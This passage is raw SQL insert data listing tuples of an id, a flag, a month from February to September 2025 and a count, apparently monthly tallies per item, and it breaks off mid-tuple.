(472,1,'202502',1),(480,1,'202502',1),(483,1,'202502',1),(485,1,'202502',1),(486,1,'202502',1),(487,1,'202502',1),(1592,1,'202502',1),(1606,1,'202502',1),(1730,1,'202502',1),(1743,1,'202502',1),(1747,1,'202502',1),(1768,1,'202502',1),(1774,1,'202502',1),(2457,1,'202502',1),(2503,1,'202502',1),(2658,1,'202502',1),(2704,1,'202502',1),(2813,1,'202502',1),(2964,1,'202502',1),(2991,1,'202502',1),(3041,1,'202502',1),(3069,1,'202502',1),(3083,1,'202502',1),(3092,1,'202502',1),(3102,1,'202502',1),(3109,1,'202502',1),(3127,1,'202502',1),(3226,1,'202502',1),(3251,1,'202502',1),(3271,1,'202502',1),(3278,1,'202502',1),(3290,1,'202502',1),(3742,1,'202502',1),(3764,1,'202502',1),(4238,1,'202502',1),(4275,1,'202502',1),(4329,1,'202502',1),(4332,1,'202502',1),(4436,1,'202502',1),(4440,1,'202502',1),(4457,1,'202502',1),(4529,1,'202502',1),(4551,1,'202502',1),(4556,1,'202502',1),(4587,1,'202502',1),(4657,1,'202502',1),(4691,1,'202502',1),(4759,1,'202502',1),(4765,1,'202502',1),(4883,1,'202502',1),(5046,1,'202502',1),(5067,1,'202502',1),(5071,1,'202502',1),(5080,1,'202502',1),(5122,1,'202502',1),(5128,1,'202502',1),(5140,1,'202502',1),(5153,1,'202502',1),(5157,1,'202502',1),(5163,1,'202502',1),(5276,1,'202502',1),(5289,1,'202502',1),(5292,1,'202502',1),(5304,1,'202502',1),(5310,1,'202502',1),(5317,1,'202502',1),(5320,1,'202502',1),(5363,1,'202502',1),(1614,1,'202502',2),(1703,1,'202502',2),(1728,1,'202502',2),(1732,1,'202502',2),(1734,1,'202502',2),(1737,1,'202502',2),(1766,1,'202502',2),(1770,1,'202502',2),(1776,1,'202502',2),(2150,1,'202502',2),(2159,1,'202502',2),(2178,1,'202502',2),(2252,1,'202502',2),(2296,1,'202502',2),(2309,1,'202502',2),(2609,1,'202502',2),(2748,1,'202502',2),(2809,1,'202502',2),(2911,1,'202502',2),(2965,1,'202502',2),(2989,1,'202502',2),(3027,1,'202502',2),(3038,1,'202502',2),(3079,1,'202502',2),(3096,1,'202502',2),(3261,1,'202502',2),(3280,1,'202502',2),(3316,1,'202502',2),(3482,1,'202502',2),(3749,1,'202502',2),(4363,1,'202502',2),(4408,1,'202502',2),(4412,1,'202502',2),(4416,1,'202502',2),(4694,1,'202502',2),(4776,1,'202502',2),(5076,1,'202502',2),(1586,1,'202502',3),(1596,1,'202502',3),(1602,1,'202502',3),(1610,1,'202502',3),(1720,1,'202502',3),(1749,1,'202502',3),(2165,1,'202502',3),(2751,1,'202502',3),(2904,1,'202502',3),(3034,1,'202502',3),(3097,1,'202502',3),(3257,1,'202502',3),(3263,1,'202502',3),(3307,1,'202502',3),(4542,1,'202502',3),(4722,1,'202502',3),(4750,1,'202502',3),(481,1,'202502',4),(1544,1,'202502',4),(1594,1,'202502',4),(3030,1,'202502',4),(4866,1,'202502',4),(1582,1,'202502',5),(1600,1,'202502',5),(1588,1,'202502',6),(1780,1,'202502',8),(3060,1,'202502',8),(1598,1,'202502',9),(1612,1,'202502',10),(2148,1,'202502',10),(1772,1,'202502',11),(3781,1,'202502',18),(80,1,'202502',27),(68,1,'202502',38),(3247,1,'202502',39),(9,1,'202502',13180),(74,1,'202503',1),(89,1,'202503',1),(108,1,'202503',1),(468,1,'202503',1),(471,1,'202503',1),(477,1,'202503',1),(480,1,'202503',1),(482,1,'202503',1),(486,1,'202503',1),(1584,1,'202503',1),(1588,1,'202503',1),(1600,1,'202503',1),(1604,1,'202503',1),(1612,1,'202503',1),(1614,1,'202503',1),(1709,1,'202503',1),(1720,1,'202503',1),(1732,1,'202503',1),(1749,1,'202503',1),(1768,1,'202503',1),(1778,1,'202503',1),(2159,1,'202503',1),(2252,1,'202503',1),(2293,1,'202503',1),(2503,1,'202503',1),(2558,1,'202503',1),(2609,1,'202503',1),(2751,1,'202503',1),(2769,1,'202503',1),(2813,1,'202503',1),(2964,1,'202503',1),(3004,1,'202503',1),(3038,1,'202503',1),(3066,1,'202503',1),(3069,1,'202503',1),(3083,1,'202503',1),(3092,1,'202503',1),(3127,1,'202503',1),(3249,1,'202503',1),(3261,1,'202503',1),(3489,1,'202503',1),(3531,1,'202503',1),(3710,1,'202503',1),(3742,1,'202503',1),(3771,1,'202503',1),(4238,1,'202503',1),(4338,1,'202503',1),(4341,1,'202503',1),(4396,1,'202503',1),(4404,1,'202503',1),(4416,1,'202503',1),(4424,1,'202503',1),(4517,1,'202503',1),(4524,1,'202503',1),(4542,1,'202503',1),(4612,1,'202503',1),(4651,1,'202503',1),(4663,1,'202503',1),(4685,1,'202503',1),(4697,1,'202503',1),(4706,1,'202503',1),(4722,1,'202503',1),(4750,1,'202503',1),(4768,1,'202503',1),(4888,1,'202503',1),(4893,1,'202503',1),(4897,1,'202503',1),(4996,1,'202503',1),(5058,1,'202503',1),(5125,1,'202503',1),(5134,1,'202503',1),(5256,1,'202503',1),(5264,1,'202503',1),(5292,1,'202503',1),(5295,1,'202503',1),(5304,1,'202503',1),(5317,1,'202503',1),(87,1,'202503',2),(479,1,'202503',2),(1586,1,'202503',2),(1602,1,'202503',2),(1606,1,'202503',2),(1707,1,'202503',2),(1724,1,'202503',2),(1770,1,'202503',2),(1780,1,'202503',2),(1782,1,'202503',2),(2154,1,'202503',2),(2156,1,'202503',2),(2161,1,'202503',2),(2178,1,'202503',2),(2297,1,'202503',2),(2457,1,'202503',2),(2704,1,'202503',2),(2804,1,'202503',2),(3005,1,'202503',2),(3079,1,'202503',2),(3090,1,'202503',2),(3104,1,'202503',2),(3229,1,'202503',2),(3243,1,'202503',2),(3282,1,'202503',2),(3285,1,'202503',2),(3764,1,'202503',2),(3777,1,'202503',2),(4335,1,'202503',2),(4428,1,'202503',2),(4440,1,'202503',2),(4448,1,'202503',2),(4546,1,'202503',2),(4677,1,'202503',2),(4759,1,'202503',2),(4776,1,'202503',2),(5033,1,'202503',2),(5314,1,'202503',2),(72,1,'202503',3),(481,1,'202503',3),(570,1,'202503',3),(1590,1,'202503',3),(1598,1,'202503',3),(1745,1,'202503',3),(2063,1,'202503',3),(2165,1,'202503',3),(2965,1,'202503',3),(3109,1,'202503',3),(3245,1,'202503',3),(3273,1,'202503',3),(3287,1,'202503',3),(3498,1,'202503',3),(3714,1,'202503',3),(4363,1,'202503',3),(4432,1,'202503',3),(4444,1,'202503',3),(5301,1,'202503',3),(335,1,'202503',4),(469,1,'202503',4),(1711,1,'202503',4),(1766,1,'202503',4),(2775,1,'202503',4),(2801,1,'202503',4),(2989,1,'202503',4),(3006,1,'202503',4),(3030,1,'202503',4),(3541,1,'202503',4),(4436,1,'202503',4),(5076,1,'202503',4),(2309,1,'202503',5),(1582,1,'202503',6),(2148,1,'202503',6),(3060,1,'202503',6),(1544,1,'202503',9),(3781,1,'202503',15),(3247,1,'202503',27),(68,1,'202503',29),(80,1,'202503',29),(9,1,'202503',19826),(76,1,'202504',1),(91,1,'202504',1),(472,1,'202504',1),(473,1,'202504',1),(477,1,'202504',1),(478,1,'202504',1),(480,1,'202504',1),(486,1,'202504',1),(488,1,'202504',1),(1594,1,'202504',1),(1600,1,'202504',1),(1614,1,'202504',1),(1705,1,'202504',1),(1713,1,'202504',1),(1718,1,'202504',1),(1720,1,'202504',1),(1732,1,'202504',1),(1737,1,'202504',1),(1743,1,'202504',1),(2503,1,'202504',1),(2704,1,'202504',1),(2769,1,'202504',1),(3066,1,'202504',1),(3243,1,'202504',1),(3263,1,'202504',1),(3265,1,'202504',1),(3273,1,'202504',1),(3278,1,'202504',1),(3282,1,'202504',1),(3316,1,'202504',1),(3714,1,'202504',1),(3727,1,'202504',1),(3731,1,'202504',1),(3738,1,'202504',1),(4275,1,'202504',1),(4335,1,'202504',1),(4514,1,'202504',1),(4520,1,'202504',1),(4542,1,'202504',1),(4608,1,'202504',1),(4645,1,'202504',1),(4660,1,'202504',1),(4674,1,'202504',1),(4677,1,'202504',1),(4688,1,'202504',1),(4744,1,'202504',1),(4765,1,'202504',1),(4858,1,'202504',1),(4866,1,'202504',1),(4897,1,'202504',1),(5028,1,'202504',1),(5046,1,'202504',1),(5071,1,'202504',1),(5101,1,'202504',1),(5125,1,'202504',1),(5140,1,'202504',1),(5271,1,'202504',1),(5304,1,'202504',1),(5330,1,'202504',1),(5359,1,'202504',1),(87,1,'202504',2),(482,1,'202504',2),(483,1,'202504',2),(485,1,'202504',2),(1584,1,'202504',2),(1596,1,'202504',2),(1604,1,'202504',2),(1695,1,'202504',2),(1701,1,'202504',2),(1715,1,'202504',2),(1724,1,'202504',2),(1726,1,'202504',2),(1734,1,'202504',2),(1770,1,'202504',2),(1774,1,'202504',2),(1780,1,'202504',2),(1782,1,'202504',2),(2154,1,'202504',2),(2252,1,'202504',2),(2293,1,'202504',2),(2457,1,'202504',2),(2748,1,'202504',2),(2813,1,'202504',2),(2964,1,'202504',2),(2989,1,'202504',2),(2991,1,'202504',2),(3004,1,'202504',2),(3005,1,'202504',2),(3034,1,'202504',2),(3063,1,'202504',2),(3096,1,'202504',2),(3104,1,'202504',2),(3107,1,'202504',2),(3117,1,'202504',2),(3245,1,'202504',2),(3257,1,'202504',2),(3285,1,'202504',2),(3290,1,'202504',2),(3742,1,'202504',2),(3746,1,'202504',2),(4301,1,'202504',2),(4332,1,'202504',2),(4338,1,'202504',2),(4363,1,'202504',2),(4377,1,'202504',2),(4391,1,'202504',2),(4412,1,'202504',2),(4436,1,'202504',2),(4524,1,'202504',2),(4612,1,'202504',2),(4651,1,'202504',2),(4657,1,'202504',2),(4697,1,'202504',2),(4750,1,'202504',2),(4988,1,'202504',2),(5042,1,'202504',2),(5128,1,'202504',2),(5295,1,'202504',2),(5301,1,'202504',2),(5353,1,'202504',2),(5356,1,'202504',2),(484,1,'202504',3),(1699,1,'202504',3),(1776,1,'202504',3),(2558,1,'202504',3),(2904,1,'202504',3),(3027,1,'202504',3),(3124,1,'202504',3),(3313,1,'202504',3),(3534,1,'202504',3),(3749,1,'202504',3),(4396,1,'202504',3),(4400,1,'202504',3),(4416,1,'202504',3),(4428,1,'202504',3),(4566,1,'202504',3),(4776,1,'202504',3),(89,1,'202504',4),(1730,1,'202504',4),(1766,1,'202504',4),(2161,1,'202504',4),(2609,1,'202504',4),(2751,1,'202504',4),(3102,1,'202504',4),(3226,1,'202504',4),(1728,1,'202504',5),(2148,1,'202504',5),(2165,1,'202504',5),(3083,1,'202504',5),(3109,1,'202504',5),(1586,1,'202504',6),(1544,1,'202504',7),(1582,1,'202504',7),(1598,1,'202504',7),(4420,1,'202504',7),(3060,1,'202504',8),(5076,1,'202504',9),(1602,1,'202504',10),(3781,1,'202504',10),(68,1,'202504',12),(80,1,'202504',47),(3247,1,'202504',67),(9,1,'202504',18028),(72,1,'202505',1),(89,1,'202505',1),(102,1,'202505',1),(469,1,'202505',1),(471,1,'202505',1),(482,1,'202505',1),(1584,1,'202505',1),(1598,1,'202505',1),(1600,1,'202505',1),(1604,1,'202505',1),(1697,1,'202505',1),(1699,1,'202505',1),(1707,1,'202505',1),(1715,1,'202505',1),(1730,1,'202505',1),(1732,1,'202505',1),(1770,1,'202505',1),(1776,1,'202505',1),(1782,1,'202505',1),(2148,1,'202505',1),(2156,1,'202505',1),(2161,1,'202505',1),(2165,1,'202505',1),(2457,1,'202505',1),(2989,1,'202505',1),(3027,1,'202505',1),(3030,1,'202505',1),(3041,1,'202505',1),(3069,1,'202505',1),(3072,1,'202505',1),(3117,1,'202505',1),(3271,1,'202505',1),(3280,1,'202505',1),(3316,1,'202505',1),(3489,1,'202505',1),(3727,1,'202505',1),(3738,1,'202505',1),(4301,1,'202505',1),(4329,1,'202505',1),(4373,1,'202505',1),(4387,1,'202505',1),(4412,1,'202505',1),(4436,1,'202505',1),(4542,1,'202505',1),(4551,1,'202505',1),(4556,1,'202505',1),(4582,1,'202505',1),(4648,1,'202505',1),(4660,1,'202505',1),(4663,1,'202505',1),(4677,1,'202505',1),(4691,1,'202505',1),(4694,1,'202505',1),(4709,1,'202505',1),(4712,1,'202505',1),(4744,1,'202505',1),(4747,1,'202505',1),(4762,1,'202505',1),(4797,1,'202505',1),(4870,1,'202505',1),(4874,1,'202505',1),(4977,1,'202505',1),(4983,1,'202505',1),(5024,1,'202505',1),(5037,1,'202505',1),(5058,1,'202505',1),(5131,1,'202505',1),(5146,1,'202505',1),(5153,1,'202505',1),(5157,1,'202505',1),(5163,1,'202505',1),(5264,1,'202505',1),(5383,1,'202505',1),(468,1,'202505',2),(472,1,'202505',2),(473,1,'202505',2),(1586,1,'202505',2),(1588,1,'202505',2),(1590,1,'202505',2),(1594,1,'202505',2),(1610,1,'202505',2),(1612,1,'202505',2),(1614,1,'202505',2),(1703,1,'202505',2),(1722,1,'202505',2),(2152,1,'202505',2),(2658,1,'202505',2),(2704,1,'202505',2),(2775,1,'202505',2),(2809,1,'202505',2),(2904,1,'202505',2),(2993,1,'202505',2),(3004,1,'202505',2),(3005,1,'202505',2),(3023,1,'202505',2),(3060,1,'202505',2),(3083,1,'202505',2),(3229,1,'202505',2),(3249,1,'202505',2),(3278,1,'202505',2),(3287,1,'202505',2),(3297,1,'202505',2),(3531,1,'202505',2),(3764,1,'202505',2),(4432,1,'202505',2),(4448,1,'202505',2),(4524,1,'202505',2),(4591,1,'202505',2),(4722,1,'202505',2),(4759,1,'202505',2),(5042,1,'202505',2),(5353,1,'202505',2),(484,1,'202505',3),(487,1,'202505',3),(1582,1,'202505',3),(1596,1,'202505',3),(1695,1,'202505',3),(1720,1,'202505',3),(2252,1,'202505',3),(2309,1,'202505',3),(2965,1,'202505',3),(3092,1,'202505',3),(3226,1,'202505',3),(3307,1,'202505',3),(3710,1,'202505',3),(4363,1,'202505',3),(4420,1,'202505',3),(4930,1,'202505',3),(5076,1,'202505',3),(5271,1,'202505',3),(470,1,'202505',4),(478,1,'202505',4),(570,1,'202505',4),(2159,1,'202505',4),(3063,1,'202505',4),(1728,1,'202505',5),(4866,1,'202505',5),(1544,1,'202505',6),(1724,1,'202505',6),(3781,1,'202505',6),(4416,1,'202505',6),(1602,1,'202505',7),(3247,1,'202505',8),(80,1,'202505',31),(68,1,'202505',41),(9,1,'202505',10993),(102,1,'202506',1),(335,1,'202506',1),(467,1,'202506',1),(472,1,'202506',1),(477,1,'202506',1),(482,1,'202506',1),(483,1,'202506',1),(484,1,'202506',1),(1606,1,'202506',1),(1610,1,'202506',1),(1614,1,'202506',1),(1699,1,'202506',1),(1722,1,'202506',1),(1728,1,'202506',1),(1741,1,'202506',1),(1749,1,'202506',1),(1770,1,'202506',1),(2161,1,'202506',1),(2165,1,'202506',1),(2178,1,'202506',1),(2248,1,'202506',1),(2609,1,'202506',1),(2704,1,'202506',1),(2751,1,'202506',1),(2809,1,'202506',1),(3004,1,'202506',1),(3005,1,'202506',1),(3097,1,'202506',1),(3265,1,'202506',1),(3271,1,'202506',1),(3275,1,'202506',1),(3278,1,'202506',1),(3282,1,'202506',1),(3290,1,'202506',1),(3489,1,'202506',1),(3721,1,'202506',1),(3752,1,'202506',1),(4301,1,'202506',1),(4335,1,'202506',1),(4341,1,'202506',1),(4408,1,'202506',1),(4412,1,'202506',1),(4432,1,'202506',1),(4444,1,'202506',1),(4457,1,'202506',1),(4529,1,'202506',1),(4556,1,'202506',1),(4566,1,'202506',1),(4691,1,'202506',1),(4697,1,'202506',1),(4709,1,'202506',1),(4747,1,'202506',1),(4753,1,'202506',1),(4858,1,'202506',1),(4862,1,'202506',1),(4977,1,'202506',1),(4988,1,'202506',1),(5028,1,'202506',1),(5046,1,'202506',1),(5067,1,'202506',1),(5071,1,'202506',1),(5137,1,'202506',1),(5153,1,'202506',1),(5157,1,'202506',1),(5253,1,'202506',1),(5264,1,'202506',1),(5271,1,'202506',1),(5276,1,'202506',1),(5280,1,'202506',1),(5320,1,'202506',1),(5334,1,'202506',1),(5356,1,'202506',1),(5363,1,'202506',1),(469,1,'202506',2),(471,1,'202506',2),(486,1,'202506',2),(1588,1,'202506',2),(1701,1,'202506',2),(1703,1,'202506',2),(1715,1,'202506',2),(1726,1,'202506',2),(1734,1,'202506',2),(1737,1,'202506',2),(1745,1,'202506',2),(1747,1,'202506',2),(1772,1,'202506',2),(2159,1,'202506',2),(2296,1,'202506',2),(2297,1,'202506',2),(2558,1,'202506',2),(2617,1,'202506',2),(2769,1,'202506',2),(2911,1,'202506',2),(2956,1,'202506',2),(3006,1,'202506',2),(3023,1,'202506',2),(3045,1,'202506',2),(3060,1,'202506',2),(3102,1,'202506',2),(3253,1,'202506',2),(3257,1,'202506',2),(3280,1,'202506',2),(3479,1,'202506',2),(3482,1,'202506',2),(3486,1,'202506',2),(3534,1,'202506',2),(3735,1,'202506',2),(3742,1,'202506',2),(4238,1,'202506',2),(4332,1,'202506',2),(4363,1,'202506',2),(4368,1,'202506',2),(4373,1,'202506',2),(4420,1,'202506',2),(4524,1,'202506',2),(4771,1,'202506',2),(4776,1,'202506',2),(4866,1,'202506',2),(5033,1,'202506',2),(5076,1,'202506',2),(5248,1,'202506',2),(5256,1,'202506',2),(5259,1,'202506',2),(5301,1,'202506',2),(5304,1,'202506',2),(72,1,'202506',3),(89,1,'202506',3),(476,1,'202506',3),(479,1,'202506',3),(480,1,'202506',3),(487,1,'202506',3),(1590,1,'202506',3),(1598,1,'202506',3),(1602,1,'202506',3),(1608,1,'202506',3),(1705,1,'202506',3),(1713,1,'202506',3),(1718,1,'202506',3),(1724,1,'202506',3),(2309,1,'202506',3),(2904,1,'202506',3),(2964,1,'202506',3),(3243,1,'202506',3),(3251,1,'202506',3),(3273,1,'202506',3),(3498,1,'202506',3),(3738,1,'202506',3),(4338,1,'202506',3),(4416,1,'202506',3),(5054,1,'202506',3),(87,1,'202506',4),(481,1,'202506',4),(1596,1,'202506',4),(1711,1,'202506',4),(3124,1,'202506',4),(570,1,'202506',5),(1544,1,'202506',5),(1584,1,'202506',5),(1600,1,'202506',5),(2150,1,'202506',5),(1743,1,'202506',8),(1586,1,'202506',9),(1582,1,'202506',10),(3781,1,'202506',14),(3247,1,'202506',18),(68,1,'202506',28),(80,1,'202506',32),(9,1,'202506',17241),(76,1,'202507',1),(89,1,'202507',1),(91,1,'202507',1),(467,1,'202507',1),(469,1,'202507',1),(479,1,'202507',1),(485,1,'202507',1),(1594,1,'202507',1),(1608,1,'202507',1),(1610,1,'202507',1),(1614,1,'202507',1),(1703,1,'202507',1),(1707,1,'202507',1),(1722,1,'202507',1),(1726,1,'202507',1),(1730,1,'202507',1),(1737,1,'202507',1),(1751,1,'202507',1),(1778,1,'202507',1),(2178,1,'202507',1),(2297,1,'202507',1),(2503,1,'202507',1),(2609,1,'202507',1),(2751,1,'202507',1),(2801,1,'202507',1),(2991,1,'202507',1),(3006,1,'202507',1),(3063,1,'202507',1),(3092,1,'202507',1),(3240,1,'202507',1),(3275,1,'202507',1),(3280,1,'202507',1),(3282,1,'202507',1),(3297,1,'202507',1),(3710,1,'202507',1),(4323,1,'202507',1),(4357,1,'202507',1),(4387,1,'202507',1),(4420,1,'202507',1),(4448,1,'202507',1),(4542,1,'202507',1),(4556,1,'202507',1),(4651,1,'202507',1),(4654,1,'202507',1),(4677,1,'202507',1),(4700,1,'202507',1),(4703,1,'202507',1),(4750,1,'202507',1),(4759,1,'202507',1),(4762,1,'202507',1),(4797,1,'202507',1),(4862,1,'202507',1),(4897,1,'202507',1),(4930,1,'202507',1),(5020,1,'202507',1),(5042,1,'202507',1),(5071,1,'202507',1),(5134,1,'202507',1),(5140,1,'202507',1),(5153,1,'202507',1),(5268,1,'202507',1),(5301,1,'202507',1),(5317,1,'202507',1),(5320,1,'202507',1),(5326,1,'202507',1),(5334,1,'202507',1),(5356,1,'202507',1),(470,1,'202507',2),(473,1,'202507',2),(474,1,'202507',2),(478,1,'202507',2),(484,1,'202507',2),(487,1,'202507',2),(1596,1,'202507',2),(1604,1,'202507',2),(1695,1,'202507',2),(1709,1,'202507',2),(1715,1,'202507',2),(1724,1,'202507',2),(1728,1,'202507',2),(1745,1,'202507',2),(1776,1,'202507',2),(2063,1,'202507',2),(2704,1,'202507',2),(2809,1,'202507',2),(2989,1,'202507',2),(3004,1,'202507',2),(3069,1,'202507',2),(3090,1,'202507',2),(3097,1,'202507',2),(3104,1,'202507',2),(3109,1,'202507',2),(3117,1,'202507',2),(3127,1,'202507',2),(3229,1,'202507',2),(3243,1,'202507',2),(3253,1,'202507',2),(3261,1,'202507',2),(3267,1,'202507',2),(3271,1,'202507',2),(3307,1,'202507',2),(3486,1,'202507',2),(3714,1,'202507',2),(3771,1,'202507',2),(4238,1,'202507',2),(4326,1,'202507',2),(4338,1,'202507',2),(4363,1,'202507',2),(4391,1,'202507',2),(4404,1,'202507',2),(4416,1,'202507',2),(4517,1,'202507',2),(4546,1,'202507',2),(4582,1,'202507',2),(4587,1,'202507',2),(4668,1,'202507',2),(4866,1,'202507',2),(4874,1,'202507',2),(4976,1,'202507',2),(5024,1,'202507',2),(5037,1,'202507',2),(5046,1,'202507',2),(5157,1,'202507',2),(5248,1,'202507',2),(5259,1,'202507',2),(72,1,'202507',3),(468,1,'202507',3),(482,1,'202507',3),(483,1,'202507',3),(1612,1,'202507',3),(2159,1,'202507',3),(2309,1,'202507',3),(2658,1,'202507',3),(2769,1,'202507',3),(2904,1,'202507',3),(3005,1,'202507',3),(3096,1,'202507',3),(3226,1,'202507',3),(3287,1,'202507',3),(3290,1,'202507',3),(3438,1,'202507',3),(4412,1,'202507',3),(4436,1,'202507',3),(4612,1,'202507',3),(4776,1,'202507',3),(5146,1,'202507',3),(5314,1,'202507',3),(570,1,'202507',4),(2775,1,'202507',4),(3107,1,'202507',4),(3735,1,'202507',4),(4457,1,'202507',4),(4722,1,'202507',4),(5067,1,'202507',4),(1598,1,'202507',5),(1602,1,'202507',5),(1766,1,'202507',5),(1770,1,'202507',5),(2148,1,'202507',5),(2161,1,'202507',5),(2165,1,'202507',5),(5076,1,'202507',5),(1544,1,'202507',6),(1600,1,'202507',6),(3764,1,'202507',6),(5080,1,'202507',6),(3060,1,'202507',8),(1586,1,'202507',10),(1743,1,'202507',10),(3781,1,'202507',10),(1582,1,'202507',13),(3247,1,'202507',16),(80,1,'202507',28),(5289,1,'202507',37),(68,1,'202507',40),(9,1,'202507',18938),(72,1,'202508',1),(74,1,'202508',1),(84,1,'202508',1),(89,1,'202508',1),(102,1,'202508',1),(110,1,'202508',1),(468,1,'202508',1),(469,1,'202508',1),(471,1,'202508',1),(472,1,'202508',1),(481,1,'202508',1),(485,1,'202508',1),(488,1,'202508',1),(1588,1,'202508',1),(1592,1,'202508',1),(1610,1,'202508',1),(1614,1,'202508',1),(1715,1,'202508',1),(1720,1,'202508',1),(1734,1,'202508',1),(1737,1,'202508',1),(1749,1,'202508',1),(1774,1,'202508',1),(2154,1,'202508',1),(2156,1,'202508',1),(2252,1,'202508',1),(2503,1,'202508',1),(2956,1,'202508',1),(2965,1,'202508',1),(2991,1,'202508',1),(2993,1,'202508',1),(3027,1,'202508',1),(3030,1,'202508',1),(3045,1,'202508',1),(3069,1,'202508',1),(3072,1,'202508',1),(3083,1,'202508',1),(3092,1,'202508',1),(3226,1,'202508',1),(3257,1,'202508',1),(3259,1,'202508',1),(3263,1,'202508',1),(3275,1,'202508',1),(3290,1,'202508',1),(3297,1,'202508',1),(3438,1,'202508',1),(3541,1,'202508',1),(3727,1,'202508',1),(3738,1,'202508',1),(3774,1,'202508',1),(3777,1,'202508',1),(4275,1,'202508',1),(4301,1,'202508',1),(4326,1,'202508',1),(4357,1,'202508',1),(4368,1,'202508',1),(4391,1,'202508',1),(4400,1,'202508',1),(4432,1,'202508',1),(4448,1,'202508',1),(4524,1,'202508',1),(4546,1,'202508',1),(4551,1,'202508',1),(4674,1,'202508',1),(4694,1,'202508',1),(4744,1,'202508',1),(4750,1,'202508',1),(4756,1,'202508',1),(4862,1,'202508',1),(4870,1,'202508',1),(4893,1,'202508',1),(4996,1,'202508',1),(5037,1,'202508',1),(5046,1,'202508',1),(5058,1,'202508',1),(5062,1,'202508',1),(5071,1,'202508',1),(5080,1,'202508',1),(5157,1,'202508',1),(5163,1,'202508',1),(5256,1,'202508',1),(5268,1,'202508',1),(5295,1,'202508',1),(5304,1,'202508',1),(5307,1,'202508',1),(5323,1,'202508',1),(5330,1,'202508',1),(5334,1,'202508',1),(5353,1,'202508',1),(5356,1,'202508',1),(5378,1,'202508',1),(470,1,'202508',2),(484,1,'202508',2),(487,1,'202508',2),(1602,1,'202508',2),(1604,1,'202508',2),(1695,1,'202508',2),(1703,1,'202508',2),(1718,1,'202508',2),(1726,1,'202508',2),(1751,1,'202508',2),(1770,1,'202508',2),(1782,1,'202508',2),(2148,1,'202508',2),(2152,1,'202508',2),(2297,1,'202508',2),(2457,1,'202508',2),(2751,1,'202508',2),(2769,1,'202508',2),(2809,1,'202508',2),(2813,1,'202508',2),(2904,1,'202508',2),(2911,1,'202508',2),(3023,1,'202508',2),(3087,1,'202508',2),(3090,1,'202508',2),(3102,1,'202508',2),(3104,1,'202508',2),(3117,1,'202508',2),(3124,1,'202508',2),(3267,1,'202508',2),(3285,1,'202508',2),(3316,1,'202508',2),(3531,1,'202508',2),(3534,1,'202508',2),(3746,1,'202508',2),(4382,1,'202508',2),(4396,1,'202508',2),(4444,1,'202508',2),(4517,1,'202508',2),(4657,1,'202508',2),(4688,1,'202508',2),(4691,1,'202508',2),(4712,1,'202508',2),(4747,1,'202508',2),(4759,1,'202508',2),(4771,1,'202508',2),(4797,1,'202508',2),(4988,1,'202508',2),(5020,1,'202508',2),(5137,1,'202508',2),(5140,1,'202508',2),(5259,1,'202508',2),(5271,1,'202508',2),(5301,1,'202508',2),(5310,1,'202508',2),(87,1,'202508',3),(477,1,'202508',3),(1598,1,'202508',3),(1711,1,'202508',3),(1743,1,'202508',3),(1778,1,'202508',3),(3107,1,'202508',3),(3278,1,'202508',3),(3282,1,'202508',3),(3287,1,'202508',3),(4338,1,'202508',3),(4341,1,'202508',3),(4363,1,'202508',3),(4408,1,'202508',3),(4556,1,'202508',3),(4700,1,'202508',3),(4980,1,'202508',3),(5067,1,'202508',3),(5076,1,'202508',3),(5248,1,'202508',3),(5289,1,'202508',3),(473,1,'202508',4),(1594,1,'202508',4),(1600,1,'202508',4),(1612,1,'202508',4),(1724,1,'202508',4),(2161,1,'202508',4),(2165,1,'202508',4),(2293,1,'202508',4),(2309,1,'202508',4),(2658,1,'202508',4),(2704,1,'202508',4),(3265,1,'202508',4),(4387,1,'202508',4),(4416,1,'202508',4),(4768,1,'202508',4),(4776,1,'202508',4),(1544,1,'202508',5),(1722,1,'202508',5),(1732,1,'202508',5),(3245,1,'202508',5),(4454,1,'202508',5),(4566,1,'202508',5),(1582,1,'202508',6),(1586,1,'202508',6),(3038,1,'202508',9),(3060,1,'202508',10),(4706,1,'202508',11),(3781,1,'202508',17),(3247,1,'202508',29),(68,1,'202508',36),(80,1,'202508',37),(9,1,'202508',15447),(1544,1,'202509',1),(1743,1,'202509',1),(4457,1,'202509',1),(5363,1,'202509',1),(87,1,'202509',2),(108,1,'202509',2),(110,1,'202509',2),(477,1,'202509',2),(482,1,'202509',2),(486,1,'202509',2),(1582,1,'202509',2),(1590,1,'202509',2),(1610,1,'202509',2),(1699,1,'202509',2),(1705,1,'202509',2),(1720,1,'202509',2),(1730,1,'202509',2),(1737,1,'202509',2),(1741,1,'202509',2),(1747,1,'202509',2),(1768,1,'202509',2),(1778,1,'202509',2),(1782,1,'202509',2),(2063,1,'202509',2),(2150,1,'202509',2),(2152,1,'202509',2),(2156,1,'202509',2),(2159,1,'202509',2),(2178,1,'202509',2),(2248,1,'202509',2),(2252,1,'202509',2),(2293,1,'202509',2),(2296,1,'202509',2),(2297,1,'202509',2),(2558,1,'202509',2),(2704,1,'202509',2),(2748,1,'202509',2),(2804,1,'202509',2),(2809,1,'202509',2),(3004,1,'202509',2),(3006,1,'202509',2),(3083,1,'202509',2),(3092,1,'202509',2),(3104,1,'202509',2),(3109,1,'202509',2),(3127,1,'202509',2),(3229,1,'202509',2),(3251,1,'202509',2),(3253,1,'202509',2),(3257,1,'202509',2),(3259,1,'202509',2),(3263,1,'202509',2),(3267,1,'202509',2),(3269,1,'202509',2),(3438,1,'202509',2),(3479,1,'202509',2),(3486,1,'202509',2),(3498,1,'202509',2),(3531,1,'202509',2),(3534,1,'202509',2),(3541,1,'202509',2),(3721,1,'202509',2),(3727,1,'202509',2),(3738,1,'202509',2),(3749,1,'202509',2),(3752,1,'202509',2),(3771,1,'202509',2),(3774,1,'202509',2),(4275,1,'202509',2),(4301,1,'202509',2),(4323,1,'202509',2),(4326,1,'202509',2),(4329,1,'202509',2),(4338,1,'202509',2),(4368,1,'202509',2),(4377,1,'202509',2),(4387,1,'202509',2),(4400,1,'202509',2),(4416,1,'202509',2),(4424,1,'202509',2),(4436,1,'202509',2),(4440,1,'202509',2),(4448,1,'202509',2),(4524,1,'202509',2),(4546,1,'202509',2),(4654,1,'202509',2),(4657,1,'202509',2),(4663,1,'202509',2),(4677,1,'202509',2),(4685,1,'202509',2),(4688,1,'202509',2),(4694,1,'202509',2),(4697,1,'202509',2),(4700,1,'202509',2),(4709,1,'202509',2),(4750,1,'202509',2),(4756,1,'202509',2),(4762,1,'202509',2),(4797,1,'202509',2),(4802,1,'202509',2),(4858,1,'202509',2),(4870,1,'202509',2),(4874,1,'202509',2),(4878,1,'202509',2),(4883,1,'202509',2),(4930,1,'202509',2),(4977,1,'202509',2),(4980,1,'202509',2),(4983,1,'202509',2),(5028,1,'202509',2),(5037,1,'202509',2),(5058,1,'20250